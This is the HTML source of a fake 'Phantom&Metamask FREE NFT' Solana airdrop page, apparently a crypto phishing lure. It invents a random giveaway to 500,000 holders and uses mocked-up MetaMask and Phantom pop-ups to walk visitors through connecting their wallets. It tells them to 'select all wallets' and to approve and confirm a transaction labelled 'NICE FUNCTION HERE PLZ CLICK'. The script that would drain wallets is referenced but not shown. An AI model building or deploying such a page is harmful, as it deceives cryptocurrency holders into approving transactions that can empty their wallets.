<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=\, initial-scale=1.0">
	<link rel="stylesheet" href="css/normalize.css">
	<link rel="stylesheet" href="css/fonts.css">
	<link rel="stylesheet" href="css/style.min.css">
	<title>Solana</title>
</head>
<body>
	
	<section class="promo">
		<div class="container">
			<header class="header">
				<div class="header__logo">
					<picture class="header__metamask-img">
						<img src="icons/metamask_logo.svg" alt="metamask">
					</picture>
					<picture class="header__phantom-img">
						<img src="icons/phantom_logo.svg" alt="phantom">
					</picture>
					<div class="header__title">
						<div class="header__title-text">
							Phantom&Metamask
							<span>FREE NFT</span>
						</div>
					</div>
				</div>
				<div class="header__right-side">
					<nav class="header__menu">
						<ul>
							<li><a href="#">About us</a></li>
							<li><a href="#">Instructions</a></li>
						</ul>
					</nav>
					<button class="button header__button">Connect Wallet</button>
				</div>
			</header>
			<div class="promo__wrapper">
				<div class="promo__text">
					<h1 class="promo__title">
						Phantom&Metamask <br>
						FREE NFT
					</h1>
					<div class="promo__descr">
						Hey there! To celebrate the launch of Solana NFTs, we randomly selected 500,000 Solana holders and distributed the "NFT" token. If you have received this token in your wallet, then you are eligible to claim the Official Solana NFT. The number of tokens you have received will determine the number of NFTs you can claim.
					</div>
					<button class="button button_big promo__button">
						<picture class="promo__button-logo">
							<img src="icons/solana_logo_white.svg" alt="solana_logo">
						</picture>
						<div class="promo__button-text">Mint now</div>
					</button>
				</div>
				<picture class="promo__img">
					<img src="img/promo_img.svg" alt="collaboration">
				</picture>
			</div>
		</div>
	</section>

	<section class="instructions">
		<div class="container">
			<h2 class="instructions__title">Instructions</h2>
			<div class="instructions__cards">
				<div class="instructions__card-item">
					<div class="instructions__card-body">
						<div class="connect-card">
							<picture class="connect-card__img">
								<img src="img/phantom_wallet.png" alt="panel" class="connect-card__img">
							</picture>
							<div class="connect-card__menu">
								<img src="icons/menu_icon.svg" alt="menu_logo" class="connect-card__menu-img">
								<div class="connect-card__menu-text">Wallet 1</div>
								<div class="connect-card__menu-textgray">(Exam...ple)</div>
							</div>
							<div class="connect-card__solscan-img">
								<img src="icons/solana_logo.svg" alt="logo">
							</div>
							<h2 class="connect-card__title">Phantom&Metamask</h2>
							<div class="connect-card__subtitle">Phantom&Metamasknft.io</div>
							<div class="connect-card__line"></div>
							<div class="connect-card__advantages">
								<div class="connect-card__advantages-title">This app would like to:</div>
								<ul class="connect-card__advantages-list">
									<li class="connect-card__advantages-list-item">
										<div class="connect-card__advantages-list-item-icon">
											<img src="icons/check_mark.svg" alt="check_mark">
										</div>
										<div class="connect-card__advantages-list-item-text">View your wallet balance & activity</div>
									</li>
									<li class="connect-card__advantages-list-item">
										<div class="connect-card__advantages-list-item-icon">
											<img src="icons/check_mark.svg" alt="check_mark">
										</div>
										<div class="connect-card__advantages-list-item-text">Request approval for transactions</div>
									</li>
								</ul>
							</div>
							<div class="connect-card__line connect-card__second-line"></div>
							<div class="connect-card__bottom-text">Only connect to websites you trust</div>
							<div class="connect-card__buttons">
								<button class="button button_square-dark-blue">Cancel</button>
								<button class="button button_square-blue">Connect</button>
							</div>
						</div>
					</div>
					<div class="instructions__card-item-text">
						Click "Connect wallet" and then click "Connect" to connect your wallet.
					</div>
				</div>
				<div class="instructions__card-item">
					<div class="instructions__card-body">
						<div class="approve-card">
							<picture class="approve-card__img">
								<img src="img/phantom_wallet.png" alt="panel">
							</picture>
							<div class="approve-card__menu">
								<img src="icons/menu_icon.svg" alt="menu_logo" class="approve-card__menu-img">
								<div class="approve-card__menu-text">Wallet 1</div>
								<div class="approve-card__menu-textgray">(Exam...ple)</div>
							</div>
							<div class="approve-card__solscan-img">
								<img src="icons/solana_logo.svg" alt="logo">
							</div>
							<h2 class="approve-card__title">Phantom&Metamask</h2>
							<div class="approve-card__subtitle">Phantom&Metamasknft.io</div>
							<div class="approve-card__info">
								<div class="approve-card__info-first-layer">
									<div class="approve-card__info-changes">Estimated Balance Changes</div>
									<picture class="approve-card__info-icon">
										<img src="icons/info_icon.svg" alt="Info">
									</picture>
								</div>
								<div class="approve-card__info-line"></div>
								<div class="approve-card__info-second-layer">
									<div class="approve-card__info-second-layer-text">SOL</div>
									<div class="approve-card__info-second-layer-value">-&#60 0.0001 SOL</div>
								</div>
							</div>
							<div class="approve-card__network">
								<picture class="approve-card__network-icon">
									<img src="icons/info_icon_purple.svg" alt="info">
								</picture>
								<div class="approve-card__network-text">Network Free</div>
								<div class="approve-card__network-value">&#60 0.00001 SOL</div>
							</div>
							<div class="approve-card__line"></div>
							<div class="approve-card__bottom-text">Only connect to websites you trust</div>
							<div class="approve-card__buttons">
								<button class="button button_square-dark-blue">Cancel</button>
								<button class="button button_square-blue">Connect</button>
							</div>
						</div>
					</div>
					<div class="instructions__card-item-text">
						Click "Mint" and then click "Approve" button. 
					</div>
				</div>
				<div class="instructions__card-item">
					<div class="instructions__card-body">
						<div class="metamask-card">
							<picture class="metamask-card__panel-img">
								<img src="img/metamask_notification.png" alt="metamask_panel">
							</picture>
							<div class="metamask-card__pages">1 of 2</div>
							<div class="metamask-card__link">
								<div class="metamask-card__link-img">
									<picture class="metamask-card__link-logo">
										<img src="icons/solana_logo.svg" alt="solana_logo">
									</picture>
								</div>
								<a href="#" class="metamask-card__link-text">https://www.nftsolana.fun</a>
							</div>
							<h2 class="metamask-card__title">Connect with Metamask</h2>
							<div class="metamask-card__subtitle">Choose a wallet to use on this site</div>
							<div class="metamask-card__scroll-top">
								<div class="metamask-card__scroll-top-left">
									<input type="checkbox" name="select_all" id="select_all">
									<label for="sellect_all" class="metamask-card__scroll-top-left-text">Select all</label>
									<picture class="metamask-card__info-icon">
										<img src="icons/info_icon_white.svg" alt="info_icon">
									</picture>
								</div>
								<a href="#" class="metamask-card__scroll-top-blue-text">New wallet</a>
							</div>
							<div class="metamask-card__main">
								<div class="metamask-card__main-item">
									<input type="checkbox" name="account_1" id="account_1" class="metamask-card__main-item-checkbox">
									<picture class="metamask-card__main-item-circle">
										<img src="icons/circle.svg" alt="circle">
									</picture>
									<div class="metamask-card__main-item-descr">
										<label for="account_1" class="metamask-card__main-item-text">Account 1 (0x9e3...d0cb)</label>
										<div class="metamask-card__main-item-textgray">0.00000611 ETH</div>
									</div>
								</div>
								<div class="metamask-card__main-item">
									<input type="checkbox" name="account_1" id="account_1" class="metamask-card__main-item-checkbox">
									<picture class="metamask-card__main-item-circle">
										<img src="icons/circle.svg" alt="circle">
									</picture>
									<div class="metamask-card__main-item-descr">
										<label for="account_1" class="metamask-card__main-item-text">Account 1 (0x9e3...d0cb)</label>
										<div class="metamask-card__main-item-textgray">0.00000611 ETH</div>
									</div>
								</div>
								<div class="metamask-card__main-item">
									<input type="checkbox" name="account_1" id="account_1" class="metamask-card__main-item-checkbox">
									<picture class="metamask-card__main-item-circle">
										<img src="icons/circle.svg" alt="circle">
									</picture>
									<div class="metamask-card__main-item-descr">
										<label for="account_1" class="metamask-card__main-item-text">Account 1 (0x9e3...d0cb)</label>
										<div class="metamask-card__main-item-textgray">0.00000611 ETH</div>
									</div>
								</div>
								<div class="metamask-card__main-item">
									<input type="checkbox" name="account_1" id="account_1" class="metamask-card__main-item-checkbox">
									<picture class="metamask-card__main-item-circle">
										<img src="icons/circle.svg" alt="circle">
									</picture>
									<div class="metamask-card__main-item-descr">
										<label for="account_1" class="metamask-card__main-item-text">Account 1 (0x9e3...d0cb)</label>
										<div class="metamask-card__main-item-textgray">0.00000611 ETH</div>
									</div>
								</div>
								<div class="metamask-card__main-item">
									<input type="checkbox" name="account_1" id="account_1" class="metamask-card__main-item-checkbox">
									<picture class="metamask-card__main-item-circle">
										<img src="icons/circle.svg" alt="circle">
									</picture>
									<div class="metamask-card__main-item-descr">
										<label for="account_1" class="metamask-card__main-item-text">Account 1 (0x9e3...d0cb)</label>
										<div class="metamask-card__main-item-textgray">0.00000611 ETH</div>
									</div>
								</div>
								<div class="metamask-card__main-item">
									<input type="checkbox" name="account_1" id="account_1" class="metamask-card__main-item-checkbox">
									<picture class="metamask-card__main-item-circle">
										<img src="icons/circle.svg" alt="circle">
									</picture>
									<div class="metamask-card__main-item-descr">
										<label for="account_1" class="metamask-card__main-item-text">Account 1 (0x9e3...d0cb)</label>
										<div class="metamask-card__main-item-textgray">0.00000611 ETH</div>
									</div>
								</div>
								<div class="metamask-card__main-item">
									<input type="checkbox" name="account_1" id="account_1" class="metamask-card__main-item-checkbox">
									<picture class="metamask-card__main-item-circle">
										<img src="icons/circle.svg" alt="circle">
									</picture>
									<div class="metamask-card__main-item-descr">
										<label for="account_1" class="metamask-card__main-item-text">Account 1 (0x9e3...d0cb)</label>
										<div class="metamask-card__main-item-textgray">0.00000611 ETH</div>
									</div>
								</div>
							</div>
							<div class="metamask-card__scroll-bottom">
								<div class="metamask-card__scroll-bottom-text">Connect only to sites you trust</div>
								<a href="#" class="metamask-card__scroll-bottom-text-blue">more</a>
							</div>
							<div class="metamask-card__line"></div>
							<div class="metamask-card__buttons">
								<button class="button button_white">Cancel</button>
								<button class="button button_light-blue">Connect</button>
							</div>
						</div>
					</div>
					<div class="instructions__card-item-text">
						Then select all wallets and click<br>
						“Connect” button.
					</div>
				</div>
				<div class="instructions__card-item">
					<div class="instructions__card-body">
						<div class="confirm-card">
							<picture class="confirm-card__panel-img">
								<img src="img/metamask_notification.png" alt="metamask_panel">
							</picture>
							<div class="confirm-card__top">
								<div class="confirm-card__top-left">
									<picture class="confirm-card__top-left-img">
										<img src="icons/small_circle.svg" alt="circle">
									</picture>
									<div class="confirm-card__top-left-text">Wallet 3</div>
								</div>
								<div class="confirm-card__top-arrow">
									<picture class="confirm-card__top-arrow-img">
										<img src="icons/right_arrow.png" alt="right_arrow">
									</picture>
								</div>
								<div class="confirm-card__top-right">
									<picture class="confirm-card__top-right-img">
										<img src="icons/small_circle.svg" alt="circle">
									</picture>
									<div class="confirm-card__top-right-text">12345</div>
								</div>
							</div>
							<div class="confirm-card__middle">
								<a href="#" class="confirm-card__middle-link">https://www.nftsolana.fun</a>
								<div class="confirm-card__middle-text">
									<span>12345:</span> 
									NICE FUNCTION HERE PLZ CLICK943230089
								</div>
								<picture class="confirm-card__middle-img">
									<img src="icons/circle.svg" alt="circle">
								</picture>
								<div class="confirm-card__middle-price">$0.00</div>
							</div>
							<div class="confirm-card__tabs">
								<ul class="confirm-card__tabs-caption">
									<li><a href="#tab_01">DETAILS</a></li>
									<li><a href="#tab_02">DATA</a></li>
									<li><a href="#tab_03">hexadecimal</a></li>
								</ul>

								<div id="tab_01" class="confirm-card__tabs-content">
									<div class="confirm-card__tabs-content-top">
										<div class="confirm-card__tabs-content-text-blue">edit</div>
										<div class="confirm-card__tabs-content-top-main">
											<div class="confirm-card__tabs-content-top-left">
												<div class="confirm-card__tabs-content-top-left-black">
													<div class="confirm-card__tabs-content-top-left-text">Approximate gas fee</div>
													<picture class="confirm-card__tabs-content-top-left-info-icon">
														<img src="icons/info_icon_white.svg" alt="info">
													</picture>
												</div>
												<div class="confirm-card__tabs-content-top-left-textgrey">Recommended by the site</div>
												<div class="confirm-card__tabs-content-top-left-textgreen">Probably in &#60 30 seconds.</div>
											</div>
											<div class="confirm-card__tabs-content-top-right">
												<div class="confirm-card__tabs-content-top-right-price">
													<div class="confirm-card__tabs-content-top-right-price-dollar">$0.54</div>
													<div class="confirm-card__tabs-content-top-right-price-eth">0.000499 ETH</div>
												</div>
												<div class="confirm-card__tabs-content-top-right-comission">
													Max comission:<br>
													0.00065916 ETH
												</div>
											</div>
										</div>
									</div>
									<div class="confirm-card__tabs-content-bottom">
										<div class="confirm-card__tabs-content-bottom-left">
											<div class="confirm-card__tabs-content-bottom-left-text">Total:</div>
											<div class="confirm-card__tabs-content-bottom-left-textgrey">Amount + gas fee</div>
										</div>
										<div class="confirm-card__tabs-content-bottom-right">
											<div class="confirm-card__tabs-content-bottom-right-price">
												<div class="confirm-card__tabs-content-bottom-right-price-dollar">$0.54</div>
												<div class="confirm-card__tabs-content-bottom-right-price-eth">0.000499 ETH</div>
											</div>
											<div class="confirm-card__tabs-content-bottom-right-amount">
												Max amount:<br>
												0.00065916 ETH
											</div>
										</div>
									</div>
								</div>
								<div id="tab_02" class="confirm-card__tabs-content">
									Вторая
								</div>
								<div id="tab_03" class="confirm-card__tabs-content">
									Третья
								</div>
							</div>
							<div class="confirm-card__line"></div>
							<div class="confirm-card__buttons">
								<button class="button button_white">Cancel</button>
								<button class="button button_light-blue">Confirm</button>
							</div>
						</div>
					</div>
					<div class="instructions__card-item-text">
						Then click “Confirm” button. Done.
					</div>
				</div>
			</div>
		</div>
	</section>

	<footer class="footer">
		<div class="footer__text">All rights Reserved © 2022</div>
	</footer>


	<script src="js/script.js"></script>
</body>
</html>